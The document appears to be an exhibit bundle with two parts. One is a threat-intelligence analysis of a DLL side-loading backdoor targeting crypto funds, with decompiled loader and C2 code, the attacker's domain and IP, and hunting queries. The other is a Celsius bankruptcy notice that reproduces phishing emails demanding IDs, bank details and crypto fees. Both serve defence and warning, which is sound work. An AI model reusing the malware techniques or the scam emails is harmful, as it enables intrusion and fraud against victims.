Two of the three files extracted from the PNG file, *logagent.exe* and *wsock32.dll*, are used to load the XOR encrypted backdoor. The following sections present our in-depth analysis of both files.

# Logagent.exe

*Logagent.exe* (Hash: 8400f2674892cdfff27b0dfe98a2a77673ce5e76b06438ac6110f0d768459942) is a legitimate system application used to log errors from Windows Media Player and send the information for troubleshooting.

The file contains the following metadata, but it is not signed:

| Description | Value |
|---|---|
| **language** | English-US |
| **code-page** | Unicode UTF-16 little endian |
| **CompanyName** | Microsoft Corporation |
| **FileDescription** | Windows Media Player Logagent |
| **FileVersion** | 12.0.19041.746 |
| **InternalName** | logagent.exe |
| **LegalCopyright** | © Microsoft Corporation. All rights reserved. |
| **OriginalFilename** | logagent.exe |
| **ProductName** | Microsoft® Windows® Operating System |
| **ProductVersion** | 12.0.19041.746 |

**A0414**

The *logagent.exe* imports function from the *wsock32.dll* which is abused by the threat actor to load malicious code into the targeted system. To trigger and run the malicious *wsock32.dll*, *logagent.exe* is run with the following arguments previously retrieved by the macro: *56762eb9-411c-4842-9530-9922c46ba2da /shadow*. Both arguments are then retrieved by *wsock32.dll*. The GUID *56762eb9-411c-4842-9530-9922c46ba2da* is the filename for the malicious *wsock32.dll* to load and */shadow* is used as an XOR key to decrypt it. Both parameters are needed for the malware to function, potentially hindering isolated analysis.



Figure 8. Command line execution from the running process logagent.exe

# Wsock32.dll

The legitimate *wsock32.dll* is the Windows Socket API used by applications to handle network connections. In this attack, the threat actor used a malicious version of *wsock32.dll* to evade detection. The malicious *wsock32.dll* is loaded by *logagent.exe* through DLL side-loading and uses DLL proxying to call the legitimate functions from the real *wsock32.dll* and avoid detection. DLL proxying is a hijacking technique where a malicious DLL sits in between the application calling the exported function and a

**A0415**

legitimate DLL that implements that exported function. In this attack, the malicious *wsock32.dll* acts as a proxy between *logagent.exe* and the legitimate *wsock32.dll*.

It is possible to notice that the DLL is forwarding the call to the legitimate functions by looking at the import address table:

| index | name (75) | location |
|---|---|---|
| 1 | accept | C:\Windows\System32\wsock32.dll.accept |
| 2 | bind | C:\Windows\System32\wsock32.dll.bind |
| 3 | closesocket | C:\Windows\System32\wsock32.dll.closesocket |
| 4 | connect | C:\Windows\System32\wsock32.dll.connect |
| 5 | getpeername | C:\Windows\System32\wsock32.dll.getpeername |
| 6 | getsockname | C:\Windows\System32\wsock32.dll.getsockname |
| 7 | getsockopt | C:\Windows\System32\wsock32.dll.getsockopt |
| 8 | htonl | C:\Windows\System32\wsock32.dll.htonl |
| 9 | htons | C:\Windows\System32\wsock32.dll.htons |
| 10 | inet_addr | C:\Windows\System32\wsock32.dll.inet_addr |
| 11 | inet_ntoa | C:\Windows\System32\wsock32.dll.inet_ntoa |
| 12 | ioctlsocket | C:\Windows\System32\wsock32.dll.ioctlsocket |
| 13 | listen | C:\Windows\System32\wsock32.dll.listen |
| 14 | ntohl | C:\Windows\System32\wsock32.dll.ntohl |
| 15 | ntohs | C:\Windows\System32\wsock32.dll.ntohs |
| 16 | recv | C:\Windows\System32\wsock32.dll.recv |
| 17 | recvfrom | C:\Windows\System32\wsock32.dll.recvfrom |
| 18 | select | C:\Windows\System32\wsock32.dll.select |
| 19 | send | C:\Windows\System32\wsock32.dll.send |
| 20 | sendto | C:\Windows\System32\wsock32.dll.sendto |
| 21 | setsockopt | C:\Windows\System32\wsock32.dll.setsockopt |
| 22 | shutdown | C:\Windows\System32\wsock32.dll.shutdown |
| 23 | socket | C:\Windows\System32\wsock32.dll.socket |
| 24 | MigrateWinsockConfiguration | C:\Windows\System32\wsock32.dll.MigrateWinsockConfiguration |
| 25 | n/a | n/a |
| 26 | n/a | n/a |
| 27 | n/a | n/a |
| 28 | n/a | n/a |

Figure 9. Import Address Table from *wsock32.dll*

| indicator (39) | detail | level |
|---|---|---|
| The original name of the file has been found | name: HijackingLib.dll | 3 |
| The file checksum is invalid | checksum: 0x00000000 | 3 |
| The file references a group of API | type: synchronization, count: 7 | 3 |
| The file references a group of API | type: network, count: 59 | 3 |
| The file references a group of API | type: diagnostic, count: 3 | 3 |
| The file references a group of API | type: memory, count: 11 | 3 |

Figure 10. Retrieving data with PeStudio revealed the original file name for the malicious *wsock32.dll*.

When the malicious *wsock32.dll* is loaded, it first retrieves the command line, and checks if the file with the GUID as a filename is present in the same directory using the *CreateFile* API to retrieve a file handle.

```
memset(MultiByteStr, 0, 0x104ui64);
memset(&Filename, 0, 0x208ui64);
memset(&FileName, 0, 0x208ui64);
GetModuleFileNameW((HMODULE)'\0', &Filename, 0x104u);
v0 = wcsrchr(&Filename, '\\');
memmove(&FileName, &Filename, (int)(2 * ((unsigned __int64)(v0 - &Filename) + 1)));
wcscat_s(&FileName, '\x01\x04', L"56762eb9-411c-4842-9530-9922c46ba2da");
v1 = '\0';
*(_QWORD *)WideCharStr = '\0';
v17 = '\0';
v18 = '\0';
v19 = '\0';
v20 = '\0';
pNumArgs = '\0';
LPSTR_CMDLine = GetCommandLineW();
LP_CMDLINEARG = CommandLineToArgvW(LPSTR_CMDLine, &pNumArgs);
wcscpy_s(WideCharStr, '\x14', LP_CMDLINEARG[2]);
WideCharToMultiByte(0, 0, WideCharStr, -1, MultiByteStr, '\x01\x04', (LPCSTR)'\0', (LPBOOL)'\0');
HDL_file = CreateFileW(
            &FileName,
            '\xFF\xFF\xFF\xFF�\0\0\0',
            '\x03',
            (LPSECURITY_ATTRIBUTES)'\0',
            '\x03',
            0x80u,
            (HANDLE)'\0');
FILE = HDL_file;
DWORD_FileSize = GetFileSize(HDL_file, (LPDWORD)'\0');
v7 = DWORD_FileSize;
v8 = DWORD_FileSize + 1;
v9 = (void *)j__malloc_base(v8);
v10 = (_BYTE *)j__malloc_base(v8);
ReadFile(FILE, v9, v7, (LPDWORD)'\0', (LPOVERLAPPED)'\0');
```

Figure 11. Verification of the presence of the file *56762eb9-411c-4842-9530-9922c46ba2da for decryption*

The malicious *wsock32.dll* loads and decodes the final implant into the memory with the GUID name which is used to remote access the infected machine.

| SHA256 | **2e8d2525a523b0a47a22a1e9cc9219d6526840d8b819d40d24046b17** |
|---|---|
| **Imphash** | 52ff8adb6e941e2ce41fd038063c5e0e |
| **Rich PE Hash** | ff102ff1ac1c891d1f5be7294035d19e |
| **Filetype** | PE32+ DLL |
| **Compile Timestamp** | 2022-08-29 06:33:10 UTC |

Once the file is loaded into the memory, it gives remote access to the threat actor. At the time of the analysis, we could not retrieve the final payload. However, we identified another variant of this attack and retrieved the payload, which is discussed in the next section. Identified implants were connecting back to the same command-and-control (C2) server.

# Related attack

We identified another file using a similar mechanism as *logagent.exe* and delivering the same payload. The loader is packaged as an MSI package and as posed an application called *CryptoDashboardV2* (Hash: e5980e18319027f0c28cd2f581e75e755a0dace72f10748852ba5f63a0c99487). After installing the MSI, it uses a legitimate application called *tplink.exe* to sideload the malicious DLL called *DUser.dll* and uses DLL proxying as well.

A0418

| creation datetime | **11/12/2009 11:47** |
|---|---|
| author | 168 Trading |
| title | Installation Database |
| page count | 200 |
| word count | 2 |
| keywords | Installer, MSI, Database |
| last saved | 11/12/2009 11:47 |
| revision number | {30CD8B94-5D3C-4B55-A5A3-3FC9C7CCE6D5} |
| last printed | 11/12/2009 11:47 |
| application name | Advanced Installer 14.5.2 build 83143 |
| subject | CryptoDashboardV2 |
| template | x64;1033 |
| code page | Latin I |
| comments | This installer database contains the logic and data required to install CryptoD |

**A0419**



Figure 12. Installation details of the MSI file

Once the package is installed, it runs and side-loads the DLL using the following command: *C:\Users\user\AppData\Roaming\Dashboard_v2\TPLink.exe" 27E57D* *84-4310-4825* *-AB22-743C78B8F3AA /sven*, where it noticeably uses a different GUID.

Further analysis of the malicious *DUser.dll* showed that its original name is also *HijackingLib.dll*, same as the malicious *wsock32.dll*. This could indicate the usage of the same tool to create these malicious DLL proxies. Below are the file details of *DUser.dll*:

| SHA256 | **90b0a4c9fe8fd0084a5d50ed781c7c8908f6ade44e5654acffea922e28** |
|---|---|
| **Imphash** | 52ff8adb6e941e2ce41fd038063c5e0e |
| **Rich PE Hash** | ff102ff1ac1c891d1f5be7294035d19e |
| **Filetype** | Win32 DLL |
| **Compile Timestamp** | 2022-06-20 07:47:07 UTC |

**A0420**

Once the DLL is running, it loads and decodes the implant in the memory and starts beaconing the same domain. In that case, the implant is using the GUID name *27E57D 84-4310-4825* *-AB22-743C78B8F3AA* and the XOR key */sven*.

# Implant analysis

The payload decoded in the memory by the malicious DLL is an implant used by the threat actor to remotely access the compromised machine. We were able to get the one from the second variant we uncovered. Below are the details of the payload:

| SHA256 | ea31e626368b923419e8966747ca33473e583376095c48e815916ff90 |
|---|---|
| Imphash | 96321fa09a450119a8f0418ec86c3e08 |
| Rich PE Hash | 8c4fb0cb671dbf8d859b875244c4730c |
| Filetype | Win32 DLL |
| Compile Timestamp | 2022-06-20 00:51:33 UTC |

First, the sample retrieves some information from the targeted system. It can connect back to a remote server and receive commands from it.

**A0421**

```
49   HINTERNENT = InternetOpenW((LPCWSTR)szAgent, 0, (LPCWSTR)'\0', 0i64, '\0');
50   if ( HINTERNENT )
51   {
52     if ( (*(_WORD *)(v9 + '\b') - 'S') & 0xFFDF )
53     {
54       Flag = 0;
55       ServerName = (const WCHAR *)(v9 + 14);
56     }
57     else
58     {
59       Flag = 1;
60       ServerName = (const WCHAR *)(v9 + '\x10');
61     }
62     PORT = 80;
63     if ( Flag )
64       PORT = 443;
65     hConnect = InternetConnectW(HINTERNENT, ServerName, PORT, (LPCWSTR)'\0', (LPCWSTR)'\0', '\x03', '\0', '\0');
66     if ( hConnect )
67     {
68       *(_OWORD *)szVerb = '\0';
69       sub_180001830(v37, (char *)&dword_18001BA14, ymm0_8_0);
70       v18 = qword_18001CEB0('\0', '\0', v37, '\xFF\xFF\xFF\xFF', '\0', '\0');
71       if ( v18 <= 8 )
72         qword_18001CEB0('\0', '\0', v37, '\xFF\xFF\xFF\xFF', szVerb, v18);
73       lpszReferrer = (const WCHAR *)&v39;
74       if ( a8 )
75         lpszReferrer = (const WCHAR *)'\0';
76       hRequest = HttpOpenRequestW(
77                    hConnect,
78                    szVerb,
79                    lpszObjectName,
80                    (LPCWSTR)'\0',
81                    lpszReferrer,
82                    (LPCWSTR *)'\0',
83                    (Flag << 23) - 0x7BFB0900,
84                    '\0');
85       hRequest_1 = hRequest;
86       if ( hRequest )
87       {
88         if ( HttpSendRequestW(hRequest, (LPCWSTR)'\0', 0, (LPVOID)'\0', '\0') )
89         {
90           if ( !a8 )
91           {
92             Buffer = '\0';
93             dwBufferLength = 4;
```

Figure 13. Details about the connection to the C2.



| Protocol | Local Address | Remote Address | State |
| --- | --- | --- | --- |
| TCP | 192.168.1.6:53691 | 198.54.115.248:443 | SYN_SENT |

Resolve addresses

Figure 14. The sample is connecting back to the domain name *strainservice[.]com*.

# Infrastructure

A0422

It is interesting to notice that the threat actor abused OpenDrive in one of the variants to deliver the payload. The OpenDrive account has been set up quickly for a one shot, indicating that it was created for only one target.

We identified one domain used as C2 server, *strainservice[.]com* and connected back to the two implants. This domain was registered on June 26 on Namecheap, just before the distribution of the first variant. At the time of the attack, the server had port 80, 443, and 2083. The implants were communicated on port 443.

# Defending against targeted attacks

In this report we analyzed a targeted attack on cryptocurrency investment fund startups. Such companies are relatively new, but manage hundreds of millions of dollars, raising interest by threat actors.

In this attack we identified that the threat actor has broad knowledge of the cryptocurrency industry as well as the challenges their targets may face, increasing the sophistication of the attack and their chance of success. The threat actor used Telegram, an app widely used in the field, to identify the profile of interest, gained the target's trust by discussing relevant topics, and finally sent a weaponized document that delivered a backdoor through multiple mechanisms. Additionally, the second attack identified was luring a fake crypto dashboard application.

The cryptocurrency market remains a field of interest for threat actors. Targeted users are identified through trusted channels to increase the chance of success. While the biggest companies can be targeted, smaller companies can also be targets of interest. The techniques used by the actor covered in this blog can be mitigated by adopting the security considerations provided below:

- Use the included indicators of compromise to investigate whether they exist in your environment and assess for potential intrusion.

**A0423**

- Educate end users about protecting personal and business information in social media, filtering unsolicited communication (in this case, Telegram chat groups), identifying lures in spear-phishing email and watering holes, and reporting of reconnaissance attempts and other suspicious activity.

- Educate end users about preventing malware infections, such as ignoring or deleting unsolicited and unexpected emails or attachments sent via instant messaging applications or social networks. Encourage end users to practice good credential hygiene and make sure the Microsoft Defender Firewall (which is enabled by default) is always on to prevent malware infection and stifle propagation.

- Change Excel macro security settings to control which macros run and under what circumstances when you open a workbook. Customers can also stop malicious XLM or VBA macros by ensuring runtime macro scanning by Antimalware Scan Interface (AMSI) is on. This feature—enabled by default—is on if the Group Policy setting for Macro Run Time Scan Scope is set to "Enable for All Files" or "Enable for Low Trust Files".

- Turn on attack surface reduction rules to prevent common attack techniques observed in this threat:

  - Block Office applications from creating executable content

  - Block Office communication application from creating child processes

  - Block Win32 API calls from Office macros

- Ensure that Microsoft Defender Antivirus is up to date and that real-time behavior monitoring is enabled.

# Detection details

# Microsoft Defender Antivirus

Microsoft Defender Antivirus detects threat components as the following malware:

**A0424**

- TrojanDownloader:O97M/Wolfic.A

- TrojanDownloader:O97M/Wolfic.B

- TrojanDownloader:O97M/Wolfic.C

- TrojanDownloader:Win32/Wolfic.D

- TrojanDownloader:Win32/Wolfic.E

- Behavior:Win32/WolficDownloader.A

- Behavior:Win32/WolficDownloader.B

# Microsoft Defender for Endpoint

Alerts with the following titles in the security center can indicate threat activity on your network:

- An executable loaded an unexpected dll

- DLL search order hijack

- 'Wolfic' malware was prevented

# Advanced hunting queries

The following hunting queries locate relevant activity.

Query that looks for Office apps that create a file within one of the known bad directories:

```
DeviceFileEvents
| where InitiatingProcessFileName has_any ("word", "excel", "access",
"outlook" "powerpnt")
| where ActionType == "FileCreated"
| where parse_path( FolderPath ).DirectoryPath has_any(
    @"C:\ProgramData\Microsoft Media",
```

**A0425**

```
@"C:\ProgramData\SoftwareCache",

@"Roaming\Dashboard_v2"

)

| project Timestamp, DeviceName, FolderPath, InitiatingProcessFileName,
SHA256, InitiatingProcessAccountName, InitiatingProcessAccountDomain
```

Query that looks for Office apps that create a file within an uncommon directory (less that five occurrences), makes a set of each machine this is seen on, and each user that has executed it to help look for how many users/hosts are compromised:

```
DeviceFileEvents
| where InitiatingProcessFileName has_any ("word", "excel", "access",
"outlook", "powerpnt")
| where ActionType == "FileCreated"
| extend Path = tostring(parse_path(FolderPath).DirectoryPath)
| summarize PathCount=count(), DeviceList=make_set(DeviceName),
AccountList=make_set(InitiatingProcessAccountName) by FileName, Path,
InitiatingProcessFileName, SHA256
| where PathCount < 5
```

Query that summarizes child process of Office apps, looking for less than five occurrences:

```
DeviceProcessEvents
| where InitiatingProcessFileName has_any ("word", "excel", "access",
"powerpnt")
| summarize ProcessCount=count(), DeviceList=make_set(DeviceName),
AccountList=make_set(InitiatingProcessAccountName) by FileName,
FolderPath, SHA256, InitiatingProcessFileName
| where ProcessCount < 5
```

Query that lists of all executables with Microsoft as ProcessVersionInfoCompanyName, groups them together by path, then looks for uncommon paths, with less than five occurrences:

```
DeviceProcessEvents
| where ProcessVersionInfoCompanyName has "Microsoft"
| extend Path = tostring(parse_path(FolderPath).DirectoryPath)
```

**A0426**

```
| summarize ProcessList=make_set(FileName) by Path
| where array_length( ProcessList ) < 5
```

Query that searches for connections to malicious domains and IP addresses:

```
DeviceNetworkEvents
| where (RemoteUrl has_any ("strainservice.com"))
    or (RemoteIP has_any ("198.54.115.248"))
```

Query that searches for files downloaded from malicious domains and IP addresses.

```
DeviceFileEvents
| where (FileOriginUrl  has_any ("strainservice.com"))
    or (FileOriginIP  has_any ("198.54.115.248"))
```

Query that searchers for Office apps downloading files from uncommon domains, groups users, filenames, and devices together:

```
DeviceFileEvents
| where InitiatingProcessFileName has_any ("word", "excel", "access",
"powerpnt")
| where ActionType == "FileCreated"
| where isnotempty( FileOriginUrl ) or isnotempty( FileOriginIP )
| summarize DomainCount=count(),
UserList=make_set(InitiatingProcessAccountName),
DeviceList=make_set(DeviceName),
    FileList=make_set(FileName) by FileOriginUrl, FileOriginIP,
InitiatingProcessFileName
```

Looks for downloaded files with uncommon file extensions, groups remote IPs, URLs, filenames, users, and devices:

```
DeviceFileEvents
| where InitiatingProcessFileName has_any ("word", "excel", "access",
"powerpnt", "outlook")
| where ActionType == "FileCreated"
| where isnotempty( FileOriginUrl ) or isnotempty( FileOriginIP )
| extend Extension=tostring(parse_path(FolderPath).Extension)
```

```
| extend  Path=tostring(parse_path(FolderPath).DirectoryPath)
| summarize ExtensionCount=count(), IpList=make_set(FileOriginIP),
UrlList=make_set(FileOriginUrl), FileList=make_set(FileName),
    UserList=make_set(InitiatingProcessAccountName),
DeviceList=make_set(DeviceName) by Extension, InitiatingProcessFileName
```

Looks for Office apps that have child processes that match the GUID command line, with a check for Microsoft binaries to reduce the results before the regex:

```
DeviceProcessEvents
| where InitiatingProcessFileName has_any ("word", "excel", "access",
"powerpnt")
| where ProcessVersionInfoCompanyName has "Microsoft"
| where ProcessCommandLine matches regex
    @"[A-Za-z0-9]+\.exe [A-Za-z0-9]{8}-[A-Za-z0-9]{4}-[A-Za-z0-9]{4}-
[A-Za-z0-9]{4}-[A-Za-z0-9]{12} /[A-Za-z0-9]$"
```

# Microsoft Sentinel

Microsoft Sentinel customers can use the TI Mapping analytic to automatically match the malicious IP and domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the **Threat Intelligence** solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace. More details on the Content Hub can be found here: https://learn.microsoft.com/azure/sentinel/sentinel-solutions-deploy

To supplement this indicator matching customers can use the Advanced Hunting queries listed above against Microsoft 365 Defender data ingested into their workspaces as well as the following Microsoft Sentinel queries:

- Least common parent and child process pairs:
  https://github.com/Azure/Azure-Sentinel/blob/master/Solutions/Windows%20Security%20Events/Hunting%20Queries/Least_Common_Parent_Child_Process.yaml

- Detect anomalous process trees: https://github.com/Azure/Azure-Sentinel/blob/46906229919827bffa14211341f52dd68e27ad81/Hunting%20Queries/Microsoft%20365%20Defender/Execution/detect-anomalous-process-trees.yaml

# Indicators of compromise

| IOC |
| --- |
| abca3253c003af67113f83df2242a7078d5224870b619489015e4fde060acad0 |
| 17e6189c19dedea678969e042c64de2a51dd9fba69ff521571d63fd92e48601b |
| a2d3c41e6812044573a939a51a22d659ec32aea00c26c1a2fdf7466f5c7e1ee9 |
| 2e8d2525a523b0a47a22a1e9cc9219d6526840d8b819d40d24046b17db8ea3fb |
| 82e67114d632795edf29ce1d50a4c1c444846d9e16cd121ce26e63c8dc4a1629 |
| 90b0a4c9fe8fd0084a5d50ed781c7c8908f6ade44e5654acffea922e281c6b33 |
| e5980e18319027f0c28cd2f581e75e755a0dace72f10748852ba5f63a0c99487 |
| 82e67114d632795edf29ce1d50a4c1c444846d9e16cd121ce26e63c8dc4a1629 |
| ea31e626368b923419e8966747ca33473e583376095c48e815916ff90382dda5 |
| C:\ProgramData\SoftwareCache\wsock32.dll |
| C:\Users\user\AppData\Roaming\Dashboard_v2\DUser.dll |
| C:\Program Files\CryptoDashboardV2\ |
| C:\ProgramData\Microsoft Media\VSDB688.tmp |
| hxxps://od.lk/d/d021d412be456a6f78a0052a1f0e3557dcfa14bf25f9d0f1d0d2d7dcdac86c73/Back |
| strainservice.com |
| 198.54.115.248 |
| 56762eb9-411c-4842-9530-9922c46ba2da |
| 27E57D 84-4310-4825 -AB22-743C78B8F3AA |
| TPLink.exe" 27E57D 84-4310-4825 -AB22-743C78B8F3AA /sven |
| logagent.exe 56762eb9-411c-4842-9530-9922c46ba2da /shadow |

**A0430**

# MITRE ATT&CK techniques

| Tactics | Technique ID | Name |
|---|---|---|
| Reconnaissance | T1591 | Gather Victim Org Information |
| | T1593.001 | Social Media |
| Resource Development | T1583.001 | Acquire Infrastructure: Domain |
| Initial Access | T1566.001 | Spearphishing Attachment |
| Execution | T1204.002 | User Execution: Malicious File |
| | T1059.005 | Command and Scripting Interpreter |
| | T1106 | Native API |
| Persistence, Privilege Escalation, Defense Evasion | T1574.002 | DLL side-Loading |
| Defense Evasion | T1027 | Obfuscated file or information |
| | T1036.005 | Masquerading: Match Legitimate |
| | T1027.009 | Obfuscated Files or Information |
| Command & Control | T1071.001 | Application Layer Protocol: Web |
| | T1132 | Data Encoding |
| Exfiltration | T1041 | Exfiltration over C2 channel |

**A0431**

Joshua A. Sussberg, P.C.
**KIRKLAND & ELLIS LLP**
**KIRKLAND & ELLIS INTERNATIONAL LLP**
601 Lexington Avenue
New York, New York 10022
Telephone:     (212) 446-4800
Facsimile:     (212) 446-4900

Patrick J. Nash, Jr., P.C. (admitted *pro hac vice*)
Ross M. Kwasteniet, P.C. (admitted *pro hac vice*)
Christopher S. Koenig
Dan Latona (admitted *pro hac vice*)
**KIRKLAND & ELLIS LLP**
**KIRKLAND & ELLIS INTERNATIONAL LLP**
300 North LaSalle Street
Chicago, Illinois 60654
Telephone:     (312) 862-2000
Facsimile:     (312) 862-2200

*Counsel to the Initial Debtors and Debtors in Possession*

*Proposed Counsel to the GK8 Debtors and Debtors in Possession*

**UNITED STATES BANKRUPTCY COURT**
**SOUTHERN DISTRICT OF NEW YORK**

| | | |
|---|---|---|
| | ) | |
| In re: | ) | Chapter 11 |
| | ) | |
| CELSIUS NETWORK LLC, *et al.*,[1] | ) | Case No. 22-10964 (MG) |
| | ) | |
| Debtors. | ) | (Jointly Administered) |
| | ) | |

**SECOND SUPPLEMENTAL NOTICE OF ADDITIONAL PHISHING ATTEMPTS**

**PLEASE TAKE NOTICE** that the Debtors became aware that phishing text messages[2]

were being sent to certain of the Debtors' customers on January 5, 2023, purporting to be customer

---

[1]     The Debtors in these chapter 11 cases, along with the last four digits of each Debtor's federal tax identification number, are:  Celsius Network LLC (2148); Celsius KeyFi LLC (4414); Celsius Lending LLC (8417); Celsius Mining LLC (1387); Celsius Network Inc. (1219); Celsius Network Limited (8554); Celsius Networks Lending LLC (3390); Celsius US Holding LLC (7956); GK8 Ltd. (1209); GK8 UK Limited (0893); and GK8 USA LLC (9450).  The location of Debtor Celsius Network LLC's principal place of business and the Debtors' service address in these chapter 11 cases is 50 Harrison Street, Suite 209F, Hoboken, New Jersey 07030.

[2]     On November 30, 2022, the Debtors filed the *Notice of Phishing Attempts* [Docket No. 1527] (the "Original Notice") to inform parties in interest of phishing emails sent to certain of the Debtors' customers purporting to be from restructuring associates at Kirkland & Ellis LLP and requesting that customers submit their wallet addresses and other account information to receive claim distributions.  Copies of such emails are attached to the Original Notice as Exhibit A.  Additionally, on December 13, 2022, the Debtors filed the *Supplemental Notice of Phishing Attempts* [Docket No. 1681] (the "Supplemental Notice") to inform parties in interest of third-party reports of these and similar phishing emails targeting cryptocurrency users and their potential sources.  Copies of such reports are attached to the Supplemental Notice as Exhibit A.

support staff of the Debtors and requesting to "take another look" at customers' accounts and "review [the customer's] account issue." A copy of one such text message is attached to this notice as **Exhibit A**.

    **PLEASE TAKE FURTHER NOTICE** that on January 20, 2023, the Debtors also became aware that phishing emails were being sent to certain of the Debtors' customers by an individual purporting to be a senior manager at Stretto, Inc., and requesting that customers submit their official personal identification, cryptocurrency wallet addresses, bank accounts, and contact information to receive claim distributions, and pay a purported "filing fee" and "tax fee." Copies of three such emails are attached to this notice as **Exhibit B**.

    **PLEASE TAKE FURTHER NOTICE** that these emails and text messages are ***not authorized messages*** from the Debtors or Stretto, Inc., the Debtors' claims agent, and are ***strongly suspected to be phishing scams aimed at inducing payments of fraudulent "fees," obtaining personally identifiable information, account information of customers, and stealing financial assets***.

    **PLEASE TAKE FURTHER NOTICE** that neither the Debtors nor their advisors will ***ever*** contact you by email, telephone call, or otherwise to request account information or other personal information absent an (i) order by the United States Bankruptcy Court for the Southern District of New York (the "Court") or (ii) on-the-record instruction from the Court; *provided*, that in connection with the Court's *Order (I) Authorizing the Debtors to Reopen Withdrawals for Certain Customers with Respect to Certain Assets Held in the Custody Program and Withhold Accounts and (II) Granting Related Relief* [Docket No. 1767] (the "Withdrawal Order"), prior to the Debtors' reopening of withdrawals, the Debtors will provide notice to parties in interest with

A0433

respect to the process for withdrawing digital assets off of the Debtors' platform in accordance with the procedures set forth therein.

       **PLEASE TAKE FURTHER NOTICE** that, if you receive any message purporting to be from the Debtors or their advisors and requesting account information or personal information, we ask that you please contact the Debtors *immediately* at CelsiusCreditorQuestions@kirkland.com or the Debtors' claims agent, Stretto, at CelsiusInquiries@stretto.com.

       **PLEASE TAKE FURTHER NOTICE** that copies of the Original Notice, the Supplemental Notice, the Withdrawal Order, and all other documents filed in these chapter 11 cases may be obtained free of charge by visiting the website of Stretto at https://cases.stretto.com/celsius.

*[Remainder of page intentionally left blank]*

**A0434**

New York, New York
Dated: January 22, 2023

*/s/ Joshua A. Sussberg*

**KIRKLAND & ELLIS LLP**
**KIRKLAND & ELLIS INTERNATIONAL LLP**
Joshua A. Sussberg, P.C.
601 Lexington Avenue
New York, New York 10022
Telephone:    (212) 446-4800
Facsimile:    (212) 446-4900
Email:    joshua.sussberg@kirkland.com

 - and -

Patrick J. Nash, Jr., P.C. (admitted *pro hac vice*)
Ross M. Kwasteniet, P.C. (admitted *pro hac vice*)
Christopher S. Koenig
Dan Latona (admitted *pro hac vice*)
300 North LaSalle Street
Chicago, Illinois 60654
Telephone:    (312) 862-2000
Facsimile:    (312) 862-2200
Email:    patrick.nash@kirkland.com
        ross.kwasteniet@kirkland.com
        chris.koenig@kirkland.com
        dan.latona@kirkland.com

*Counsel to the Initial Debtors and Debtors in Possession*

*Proposed Counsel to the GK8 Debtors and Debtors in Possession*

**Exhibit A**

**Phishing Text Message**



A0437

## Exhibit B

**Phishing Emails**

**From:** Stretto - Celcius Case 22-10943 <celsius@cases.stretto.restructuring.ltd>
**Sent:** Friday, January 20, 2023 11:01 AM
**To:** ▮▮▮▮▮▮▮▮▮▮▮▮▮▮▮▮▮▮▮▮▮▮▮▮▮
**Subject:** Celcius Case - Additional Information Needed

---

### *This is an EXTERNAL email. STOP. THINK! DON'T click links or open files unless you know the sender!*

Dear ▮▮▮▮▮▮▮▮▮

I am writing to inform you that [Celcius Network LLC] has filed for bankruptcy and now currently undergoing the process of liquidation and under the protection of United States Bankruptcy Court - Case No. 22-10964. And as a result, We need additional information related to your claim against [Celcius Network LLC], which has filed for bankruptcy.

In addition, please provide us with the following information to process the payment:
* A copy of a valid ID
* Bank account information (wire transfer) or
* Crypto Wallet Address (ETH/USDT-ERC20)
* Contact information (phone number and email address)

As a creditor of the company, You will need to pay a filling fee (Chapter 7 bankruptcy) and tax fee (5% if You are US citizen and 10% if you are not US Citizen). Below are the payment details and you must pay them before **February 15, 2023** or you will be deemed to have withdrawn from the case.

* Case Number: **22-10964.**
* Debtor: **Celcius Network LLC.**
* Creditor: ▮▮▮▮▮▮▮▮▮▮▮▮▮▮
* Claim Amount: ▮▮▮▮▮▮▮▮▮▮▮
* Tax fee: **5%**
* Tax Amount: ▮▮▮▮▮▮▮
* Pay to (Crypto Wallet): (ETH/USDT-ERC20)
**0x36Ea670bDB878332B7f279F960aC4464377d1D27**
* Due Date: **Febuary 15 2023**

After you send the tax fee payment, Please reply this email along with your Transaction hash link (etherscan) or screenshot of it and your additional information. You will receive a notice of important dates and claim distribution related to the bankruptcy case No.22-10964.

Please be sure to keep an eye out for any such notices and respond promptly if required.
If you have any questions or concerns, please don't hesitate to contact me who is handling the case.

Regards
**Emily A. Baum**
Senior Manager
Security Risk Management

---

©2023 Stretto. All rights reserved.
410 Exchange, STE 100
Irvine, CA 92602

1

**A0439**

On Fri, 20 Jan 2023, 12:54 Stretto - Celcius Case 22-10943, <celsius@cases.stretto.restructuring.ltd> wrote:

Dear █████████████████████████

I am writing to inform you that [Celcius Network LLC] has filed for bankruptcy and now currently undergoing the process of liquidation and under the protection of United States Bankruptcy Court - Case No. 22-10964. And as a result, We need additional information related to your claim against [Celcius Network LLC], which has filed for bankruptcy.

In addition, please provide us with the following information to process the payment:
* A copy of a valid ID
* Bank account information (wire transfer) or
* Crypto Wallet Address (ETH/USDT-ERC20)
* Contact information (phone number and email address)

As a creditor of the company, You will need to pay a filling fee (Chapter 7 bankruptcy) and tax fee (5% if You are US citizen and 10% if you are not US Citizen). Below are the payment details and you must pay them before **February 15, 2023** or you will be deemed to have withdrawn from the case.

* Case Number: **22-10964.**
* Debtor: ████████████████████████
* Creditor: **XXXXXXXXXXXX**
* Claim Amount: ████████████████████
* Tax fee: **10%**
* Tax Amount: ██████████████████
* Pay to (Crypto Wallet): (ETH/USDT-ERC20)
**0x36Ea670bDB878332B7f279F960aC4464377d1D27**
* Due Date: **Febuary 15 2023**

After you send the tax fee payment, Please reply this email along with your Transaction hash link (ETH) or screenshot of it and your additional information. You will receive a notice of important dates and claim distribution related to the bankruptcy case No.22-10964.

Please be sure to keep an eye out for any such notices and respond promptly if required.
If you have any questions or concerns, please don't hesitate to contact me who is handling the case.

Regards
**Emily A. Baum**
Senior Manager
Security Risk Management

©2023 Stretto. All rights reserved.
410 Exchange, STE 100
Irvine, CA 92602

2

**A0440**

**From:** Stretto - Celcius Case 22-10943 <celsius@cases.stretto.restructuring.ltd>
**Date:** January 21, 2023 at 12:53:04 EST
**To:** ████████████████████████████████████

**Subject: Celcius Case - Final order and Additional Information Needed**

██████████████████████████████████████

I am writing to inform you that [Celcius Network LLC] has filed for bankruptcy and now currently undergoing the process of liquidation and under the protection of United States Bankruptcy Court - Case No. 22-10964. And you are now egible and confirmed as a creditor **[Final Creditor List].**

And as a result, We need additional information related to your claim against [Celcius Network LLC], which has filed for bankruptcy according to latest announcement about the **"[1] FINAL ORDER (I) AUTHORIZING THE PAYMENT OF CERTAIN TAXES AND FEES AND (II) GRANTING RELATED RELIEF"**

In addition, please provide us with the following information to process the payment:
* **A copy of a valid ID**
